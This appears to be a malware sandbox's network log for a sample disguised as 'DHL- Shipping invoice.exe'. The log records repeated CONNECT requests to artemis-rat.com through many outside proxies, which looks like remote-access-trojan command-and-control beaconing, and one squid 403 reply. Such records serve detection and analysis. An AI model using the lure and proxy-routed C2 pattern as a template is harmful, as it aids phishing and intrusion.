                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.062942982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.359534025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.953249931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.562699080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.062607050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.062578917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:34.062482119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2031192.168.2.455635192.154.195.7690006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.781718969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2032192.168.2.452241194.4.50.61123346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.790313959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2033192.168.2.452259147.124.212.31110706484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.814266920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.953181028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.047013044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.141093969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2034192.168.2.452345107.180.88.41375976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.828758955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.953222036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.047029018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.141068935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:33.187794924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:45.343565941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2035192.168.2.45447991.134.140.160272076484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.850894928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.359277010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2036192.168.2.45258492.204.135.37112846484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.855779886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2037192.168.2.454469154.201.66.112806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.868480921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2038192.168.2.452350188.164.193.178112516484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.871912003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.953247070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.047013044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.141068935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:33.187907934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:45.343564034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:57.343638897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2039192.168.2.455640199.102.104.7041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.919219971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2040192.168.2.454505103.200.135.22841456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.920134068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2041192.168.2.45563443.155.153.244156736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.926470995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2042192.168.2.45563643.155.165.196156736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.936584949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2043192.168.2.45249646.47.197.21031286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.957854033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.953291893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.062875986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.063389063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:33.062283993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:45.062391996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:46.477555037 CET536INHTTP/1.1 403 Forbidden
                            Server: squid
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:46 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 3700
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            X-Cache: MISS from host
                            X-Cache-Lookup: NONE from host:3128
                            Connection: close
                            Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e d0 9e d0 a8 d0 98 d0 91 d0 9a d0 90 3a 20 d0 97 d0 b0 d0 bf d1 80 d0 be d1 88 d0 b5 d0 bd d0 bd d1 8b d0 b9 20 55 52 4c 20 d0 bd d0 b5 20 d0 bc d0 be d0 b6 d0 b5 d1 82 20 d0 b1 d1 8b d1 82 d1 8c 20 d0
                            Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>: URL


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2044192.168.2.452550107.180.90.42503396484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.959378958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.953363895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.047009945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.141073942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:33.188565969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:45.343561888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:57.343636036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:21.343542099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:09.506566048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2045192.168.2.452501132.148.167.243280406484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.963460922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.453068018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2046192.168.2.45537574.119.144.6041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.965673923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2047192.168.2.452489162.144.121.232167956484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.989523888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2048192.168.2.45456445.119.113.65846484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.024974108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.140664101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.223870993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.250170946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:33.343533039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2049192.168.2.452582138.197.92.11045276484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.036962032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.140703917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.223876953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.250155926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:33.343535900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:45.343565941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2050192.168.2.45245241.65.162.7319766484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.041322947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.140738964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.223942041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.250154018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:33.343590021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2051192.168.2.455588103.156.232.8931256484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.105832100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
